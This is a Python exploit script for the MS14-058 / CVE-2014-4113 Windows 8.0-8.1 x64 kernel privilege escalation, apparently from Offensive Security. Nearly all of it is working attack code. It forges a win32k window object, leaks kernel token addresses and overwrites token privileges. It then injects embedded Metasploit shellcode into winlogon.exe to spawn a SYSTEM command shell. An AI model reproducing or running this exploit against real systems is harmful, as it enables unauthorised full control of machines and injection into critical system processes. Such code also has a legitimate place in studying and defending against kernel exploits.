# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058) # CVE-2014-4113 Privilege Escalation # http://www.offensive-security.com # Thx to Moritz Jodeit for the beautiful writeup # http://www.exploit-db.com/docs/35152.pdf # Target OS Windows 8.0 - 8.1 x64 # Author: Matteo Memelli ryujin <at> offensive-security.com from ctypes import * from ctypes.wintypes import * import struct, sys, os, time, threading, signal ULONG_PTR = PVOID = LPVOID HCURSOR = HICON PDWORD = POINTER(DWORD) PQWORD = POINTER(LPVOID) LRESULT = LPVOID UCHAR = c_ubyte QWORD = c_ulonglong CHAR = c_char NTSTATUS = DWORD MIIM_STRING = 0x00000040 MIIM_SUBMENU = 0x00000004 WH_CALLWNDPROC = 0x4 GWLP_WNDPROC = -0x4 NULL = 0x0 SystemExtendedHandleInformation = 64 ObjectDataInformation = 2 STATUS_INFO_LENGTH_MISMATCH = 0xC0000004 STATUS_BUFFER_OVERFLOW = 0x80000005L STATUS_INVALID_HANDLE = 0xC0000008L STATUS_BUFFER_TOO_SMALL = 0xC0000023L STATUS_SUCCESS = 0 TOKEN_ALL_ACCESS = 0xf00ff DISABLE_MAX_PRIVILEGE = 0x1 FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) VIRTUAL_MEM = ( 0x1000 | 0x2000 ) TH32CS_SNAPPROCESS = 0x02 WinFunc1 = WINFUNCTYPE(LPVOID, INT, WPARAM, LPARAM) WinFunc2 = WINFUNCTYPE(HWND, LPVOID, INT, WPARAM, LPARAM) WNDPROC = WINFUNCTYPE(LPVOID, HWND, UINT, WPARAM, LPARAM) bWndProcFlag = False bHookCallbackFlag = False EXPLOITED = False Hmenu01 = Hmenu02 = None # /* # * windows/x64/exec - 275 bytes # * http://www.metasploit.com # * VERBOSE=false, PrependMigrate=false, EXITFUNC=thread, # * CMD=cmd.exe # */ SHELLCODE = ( "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" "\x2e\x65\x78\x65\x00") class LSA_UNICODE_STRING(Structure): """Represent the LSA_UNICODE_STRING on ntdll.""" _fields_ = [ ("Length", USHORT), ("MaximumLength", USHORT), ("Buffer", LPWSTR), ] class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.""" _fields_ = [ ("Object", PVOID), ("UniqueProcessId", PVOID), ("HandleValue", PVOID), ("GrantedAccess", ULONG), ("CreatorBackTraceIndex", USHORT), ("ObjectTypeIndex", USHORT), ("HandleAttributes", ULONG), ("Reserved", ULONG), ] class SYSTEM_HANDLE_INFORMATION_EX(Structure): """Represent the SYSTEM_HANDLE_INFORMATION on ntdll.""" _fields_ = [ ("NumberOfHandles", PVOID), ("Reserved", PVOID), ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), ] class PUBLIC_OBJECT_TYPE_INFORMATION(Structure): """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.""" _fields_ = [ ("Name", LSA_UNICODE_STRING), ("Reserved", ULONG * 22), ] class MENUITEMINFO(Structure): """Contains information about a menu item.""" _fields_ = [ ("cbSize" , UINT), ("fMask" , UINT), ("fType" , UINT), ("fState" , UINT), ("wID" , UINT), ("hSubMenu" , HMENU), ("hbmpChecked" , HBITMAP), ("hbmpUnchecked", HBITMAP), ("dwItemData" , ULONG_PTR), ("dwTypeData" , LPWSTR), ("cch" , UINT), ("hbmpItem" , HBITMAP), ] class WNDCLASS(Structure): """Contains the window class attributes that are registered by the RegisterClass function.""" _fields_ = [ ("style" , UINT), ("lpfnWndProc" , WNDPROC), ("cbClsExtra" , INT), ("cbWndExtra" , INT), ("hInstance" , HINSTANCE), ("hIcon" , HCURSOR), ("hCursor" , HBITMAP), ("hbrBackground", HBRUSH), ("lpszMenuName" , LPWSTR), ("lpszClassName", LPWSTR), ] class PROCESSENTRY32(Structure): """Describes an entry from a list of the processes residing in the system address space when a snapshot was taken.""" _fields_ = [ ( 'dwSize' , DWORD ) , ( 'cntUsage' , DWORD) , ( 'th32ProcessID' , DWORD) , ( 'th32DefaultHeapID' , POINTER(ULONG)) , ( 'th32ModuleID' , DWORD) , ( 'cntThreads' , DWORD) , ( 'th32ParentProcessID' , DWORD) , ( 'pcPriClassBase' , LONG) , ( 'dwFlags' , DWORD) , ( 'szExeFile' , CHAR * MAX_PATH ) ] user32 = windll.user32 kernel32 = windll.kernel32 ntdll = windll.ntdll advapi32 = windll.advapi32 user32.PostMessageW.argtypes = [HWND, UINT, WPARAM, LPARAM] user32.PostMessageW.restype = BOOL user32.DefWindowProcW.argtypes = [HWND, UINT, WPARAM, LPARAM] user32.DefWindowProcW.restype = LRESULT user32.UnhookWindowsHook.argtypes = [DWORD, WinFunc1] user32.UnhookWindowsHook.restype = BOOL user32.SetWindowLongPtrW.argtypes = [HWND, DWORD, WinFunc2] user32.SetWindowLongPtrW.restype = LPVOID user32.CallNextHookEx.argtypes = [DWORD, DWORD, WPARAM, LPARAM] user32.CallNextHookEx.restype = LRESULT user32.RegisterClassW.argtypes = [LPVOID] user32.RegisterClassW.restype = BOOL user32.CreateWindowExW.argtypes = [DWORD, LPWSTR, LPWSTR, DWORD, INT, INT, INT, INT, HWND, HMENU, HINSTANCE, LPVOID] user32.CreateWindowExW.restype = HWND user32.InsertMenuItemW.argtypes = [HMENU, UINT, BOOL, LPVOID] user32.InsertMenuItemW.restype = BOOL user32.DestroyMenu.argtypes = [HMENU] user32.DestroyMenu.restype = BOOL user32.SetWindowsHookExW.argtypes = [DWORD, WinFunc1, DWORD, DWORD] user32.SetWindowsHookExW.restype = BOOL user32.TrackPopupMenu.argtypes = [HMENU, UINT, INT, INT, INT, HWND, DWORD] user32.TrackPopupMenu.restype = BOOL advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)] advapi32.OpenProcessToken.restype = BOOL advapi32.CreateRestrictedToken.argtypes = [HANDLE, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, POINTER(HANDLE)] advapi32.CreateRestrictedToken.restype = BOOL advapi32.AdjustTokenPrivileges.argtypes = [HANDLE, BOOL, DWORD, DWORD, DWORD, DWORD] advapi32.AdjustTokenPrivileges.restype = BOOL advapi32.ImpersonateLoggedOnUser.argtypes = [HANDLE] advapi32.ImpersonateLoggedOnUser.restype = BOOL kernel32.GetCurrentProcess.restype = HANDLE kernel32.WriteProcessMemory.argtypes = [HANDLE, QWORD, LPCSTR, DWORD, POINTER(LPVOID)] kernel32.WriteProcessMemory.restype = BOOL kernel32.OpenProcess.argtypes = [DWORD, BOOL, DWORD] kernel32.OpenProcess.restype = HANDLE kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, DWORD, DWORD, DWORD] kernel32.VirtualAllocEx.restype = LPVOID kernel32.CreateRemoteThread.argtypes = [HANDLE, QWORD, UINT, QWORD, LPVOID, DWORD, POINTER(HANDLE)] kernel32.CreateRemoteThread.restype = BOOL kernel32.CreateToolhelp32Snapshot.argtypes = [DWORD, DWORD] kernel32.CreateToolhelp32Snapshot.restype = HANDLE kernel32.CloseHandle.argtypes = [HANDLE] kernel32.CloseHandle.restype = BOOL kernel32.Process32First.argtypes = [HANDLE, POINTER(PROCESSENTRY32)] kernel32.Process32First.restype = BOOL kernel32.Process32Next.argtypes = [HANDLE, POINTER(PROCESSENTRY32)] kernel32.Process32Next.restype = BOOL kernel32.GetCurrentThreadId.restype = DWORD ntdll.NtAllocateVirtualMemory.argtypes = [HANDLE, LPVOID, ULONG, LPVOID, ULONG, DWORD] ntdll.NtAllocateVirtualMemory.restype = NTSTATUS ntdll.NtQueryObject.argtypes = [HANDLE, DWORD, POINTER(PUBLIC_OBJECT_TYPE_INFORMATION), DWORD, DWORD] ntdll.NtQueryObject.restype = NTSTATUS ntdll.NtQuerySystemInformation.argtypes = [DWORD, POINTER(SYSTEM_HANDLE_INFORMATION_EX), DWORD, POINTER(DWORD)] ntdll.NtQuerySystemInformation.restype = NTSTATUS def log(msg, e=None): if e == "e": msg = "[!] " + msg if e == "d": msg = "[*] " + msg else: msg = "[+] " + msg print msg def getLastError(): """Format GetLastError""" buf = create_string_buffer(2048) if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, kernel32.GetLastError(), 0, buf, sizeof(buf), NULL): log(buf.value, "e") else: log("Unknown Error", "e") class x_file_handles (Exception): pass def get_type_info(handle): """Get the handle type information.""" public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION() size = DWORD(sizeof(public_object_type_information)) while True: result = ntdll.NtQueryObject(handle, ObjectDataInformation, byref(public_object_type_information), size, 0x0) if result == STATUS_SUCCESS: return public_object_type_information.Name.Buffer elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(public_object_type_information, size.value) elif result == STATUS_INVALID_HANDLE: return "INVALID HANDLE: %s" % hex(handle) else: raise x_file_handles("NtQueryObject", hex(result)) def get_handles(): """Return all the open handles in the system""" system_handle_information = SYSTEM_HANDLE_INFORMATION_EX() size = DWORD (sizeof (system_handle_information)) while True: result = ntdll.NtQuerySystemInformation( SystemExtendedHandleInformation, byref(system_handle_information), size, byref(size) ) if result == STATUS_SUCCESS: break elif result == STATUS_INFO_LENGTH_MISMATCH: size = DWORD(size.value * 4) resize(system_handle_information, size.value) else: raise x_file_handles("NtQuerySystemInformation", hex(result)) pHandles = cast( system_handle_information.Handles, POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \ system_handle_information.NumberOfHandles) ) for handle in pHandles.contents: yield handle.UniqueProcessId, handle.HandleValue, handle.Object def WndProc(hwnd, message, wParam, lParam): """Window procedure""" global bWndProcFlag if message == 289 and not bWndProcFlag: bWndProcFlag = True user32.PostMessageW(hwnd, 256, 40, 0) user32.PostMessageW(hwnd, 256, 39, 0) user32.PostMessageW(hwnd, 513, 0, 0) return user32.DefWindowProcW(hwnd, message, wParam, lParam) def hook_callback_one(code, wParam, lParam): """Sets a new address for the window procedure""" global bHookCallbackFlag if ((cast((lParam+sizeof(HANDLE)*2),PDWORD)).contents).value == 0x1eb and\ not bHookCallbackFlag: bHookCallbackFlag = True if user32.UnhookWindowsHook(WH_CALLWNDPROC, CALLBACK01): # Sets a new address for the window procedure log("Callback triggered!") log("Setting the new address for the window procedure...") lpPrevWndFunc = user32.SetWindowLongPtrW\ ((cast((lParam+sizeof(HANDLE)*3),PDWORD).contents).value, GWLP_WNDPROC, CALLBACK02) return user32.CallNextHookEx(0, code, wParam, lParam) def hook_callback_two(hWnd, Msg, wParam, lParam): """Once called will return the fake tagWND address""" global EXPLOITED user32.EndMenu() EXPLOITED = True log("Returning the fake tagWND and overwriting token privileges...") return 0x00000000FFFFFFFB def buildMenuAndTrigger(): """Create menus and invoke TrackPopupMenu""" global Hmenu01, Hmenu02 log("Creating windows and menus...") wndClass = WNDCLASS() wndClass.lpfnWndProc = WNDPROC(WndProc) wndClass.lpszClassName = u"pwned" wndClass.cbClsExtra = wndClass.cbWndExtra = 0 # Registering Class if not user32.RegisterClassW(addressof(wndClass)): log("RegisterClassW failed", "e") sys.exit() # Creating the Window hWnd = user32.CreateWindowExW(0, u"pwned", u"pwned", 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL) if not hWnd: log("CreateWindowExW Failed", "e") sys.exit() # Creating popup menu user32.CreatePopupMenu.restype = HMENU Hmenu01 = user32.CreatePopupMenu() if not Hmenu01: log("CreatePopupMenu failed 0x1", "e") sys.exit() Hmenu01Info = MENUITEMINFO() Hmenu01Info.cbSize = sizeof(MENUITEMINFO) Hmenu01Info.fMask = MIIM_STRING # Insert first menu if not user32.InsertMenuItemW(Hmenu01, 0, True, addressof(Hmenu01Info)): log("Error in InsertMenuItema 0x1", "e") user32.DestroyMenu(Hmenu01) sys.exit() # Creating second menu Hmenu02 = user32.CreatePopupMenu() if not Hmenu02: log("CreatePopupMenu failed 0x2", "e") sys.exit() Hmenu02Info = MENUITEMINFO() Hmenu02Info.cbSize = sizeof(MENUITEMINFO) Hmenu02Info.fMask = (MIIM_STRING | MIIM_SUBMENU) Hmenu02Info.dwTypeData = "" Hmenu02Info.cch = 1 Hmenu02Info.hSubMenu = Hmenu01 # Insert second menu if not user32.InsertMenuItemW(Hmenu02, 0, True, addressof(Hmenu02Info)): log("Error in InsertMenuItema 0x2", "e") user32.DestroyMenu(Hmenu01) user32.DestroyMenu(Hmenu01) sys.exit() # Set window callback tid = kernel32.GetCurrentThreadId() if not user32.SetWindowsHookExW(WH_CALLWNDPROC, CALLBACK01, NULL, tid): log("Failed SetWindowsHookExA 0x1", "e") sys.exit() # Crash it! log("Invoking TrackPopupMenu...") user32.TrackPopupMenu(Hmenu02, 0, -10000, -10000, 0, hWnd, NULL) def alloctagWND(): """Allocate a fake tagWND in userspace at address 0x00000000fffffff0""" hProcess = HANDLE(kernel32.GetCurrentProcess()) hToken = HANDLE() hRestrictedToken = HANDLE() if not advapi32.OpenProcessToken(hProcess,TOKEN_ALL_ACCESS, byref(hToken)): log("Could not open current process token", "e") getLastError() sys.exit() if not advapi32.CreateRestrictedToken(hToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, byref(hRestrictedToken)): log("Could not create the restricted token", "e") getLastError() sys.exit() if not advapi32.AdjustTokenPrivileges(hRestrictedToken, 1, NULL, 0, NULL, NULL): log("Could not adjust privileges to the restricted token", "e") getLastError() sys.exit() # Leak Token addresses in kernel space log("Leaking token addresses from kernel space...") for pid, handle, obj in get_handles(): if pid==os.getpid() and get_type_info(handle) == "Token": if hToken.value == handle: log("Current process token address: %x" % obj) if hRestrictedToken.value == handle: log("Restricted token address: %x" % obj) RestrictedToken = obj CurrentProcessWin32Process = "\x00"*8 # nt!_TOKEN+0x40 Privileges : _SEP_TOKEN_PRIVILEGES # +0x3 overwrite Enabled in _SEP_TOKEN_PRIVILEGES, -0x8 ADD RAX,0x8 TokenAddress = struct.pack("<Q", RestrictedToken+0x40+0x3-0x8) tagWND = "\x41"*11 + "\x00\x00\x00\x00" +\ "\x42"*0xC + "\xf0\xff\xff\xff\x00\x00\x00\x00" +\ "\x00"*8 +\ "\x43"*0x145 + CurrentProcessWin32Process + "\x45"*0x58 +\ TokenAddress + "\x47"*0x28 ## Allocate space for the input buffer lpBaseAddress = LPVOID(0x00000000fffffff0) Zerobits = ULONG(0) RegionSize = LPVOID(0x1000) written = LPVOID(0) dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffffffffffff, byref(lpBaseAddress), 0x0, byref(RegionSize), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) if dwStatus != STATUS_SUCCESS: log("Failed to allocate tagWND object", "e") getLastError() sys.exit() # Copy input buffer to the fake tagWND nSize = 0x200 written = LPVOID(0) lpBaseAddress = QWORD(0x00000000fffffff0) dwStatus = kernel32.WriteProcessMemory(0xffffffffffffffff, lpBaseAddress, tagWND, nSize, byref(written)) if dwStatus == 0: log("Failed to copy the input buffer to the tagWND object", "e") getLastError() sys.exit() log("Fake win32k!tagWND allocated, written %d bytes to 0x%x" %\ (written.value, lpBaseAddress.value)) return hRestrictedToken def injectShell(hPrivilegedToken): """Impersonate privileged token and inject shellcode into winlogon.exe""" while not EXPLOITED: time.sleep(0.1) log("-"*70) log("Impersonating the privileged token...") if not advapi32.ImpersonateLoggedOnUser(hPrivilegedToken): log("Could not impersonate the privileged token", "e") getLastError() sys.exit() # Get winlogon.exe pid pid = getpid("winlogon.exe") # Get a handle to the winlogon process we are injecting into hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid)) if not hProcess: log("Couldn't acquire a handle to PID: %s" % pid, "e") sys.exit() log("Obtained handle 0x%x for the winlogon.exe process" % hProcess) # Creating shellcode buffer to inject into the host process sh = create_string_buffer(SHELLCODE, len(SHELLCODE)) code_size = len(SHELLCODE) # Allocate some space for the shellcode (in the program memory) sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) if not sh_address: log("Could not allocate shellcode in the remote process") getLastError() sys.exit() log("Allocated memory at address 0x%x" % sh_address) # Inject shellcode in to winlogon.exe process space written = LPVOID(0) shellcode = QWORD(sh_address) dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size, byref(written)) if not dwStatus: log("Could not write shellcode into winlogon.exe", "e") getLastError() sys.exit() log("Injected %d bytes of shellcode to 0x%x" % (written.value, sh_address)) # Now we create the remote thread and point its entry routine to be head of # our shellcode thread_id = HANDLE(0) if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0, byref(thread_id)): log("Failed to inject shellcode into winlogon.exe") sys.exit(0) log("Remote thread 0x%08x created" % thread_id.value) log("Spawning SYSTEM shell...") # Kill python process to kill the window and avoid BSODs os.kill(os.getpid(), signal.SIGABRT) def getpid(procname): """ Get Process Pid by procname """ pid = None try: hProcessSnap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) pe32 = PROCESSENTRY32() pe32.dwSize = sizeof(PROCESSENTRY32) ret = kernel32.Process32First(hProcessSnap , byref(pe32)) while ret: if pe32.szExeFile == LPSTR(procname).value: pid = pe32.th32ProcessID ret = kernel32.Process32Next(hProcessSnap, byref(pe32)) kernel32.CloseHandle ( hProcessSnap ) except Exception, e: log(str(e), "e") if not pid: log("Could not find %s PID" % procname) sys.exit() return pid CALLBACK01 = WinFunc1(hook_callback_one) CALLBACK02 = WinFunc2(hook_callback_two) if __name__ == '__main__': log("MS14-058 Privilege Escalation - ryujin <at> offensive-security.com", "d") # Prepare the battlefield hPrivilegedToken = alloctagWND() # Start the injection thread t1 = threading.Thread(target=injectShell, args = (hPrivilegedToken,)) t1.daemon = False t1.start() # Trigger the vuln buildMenuAndTrigger()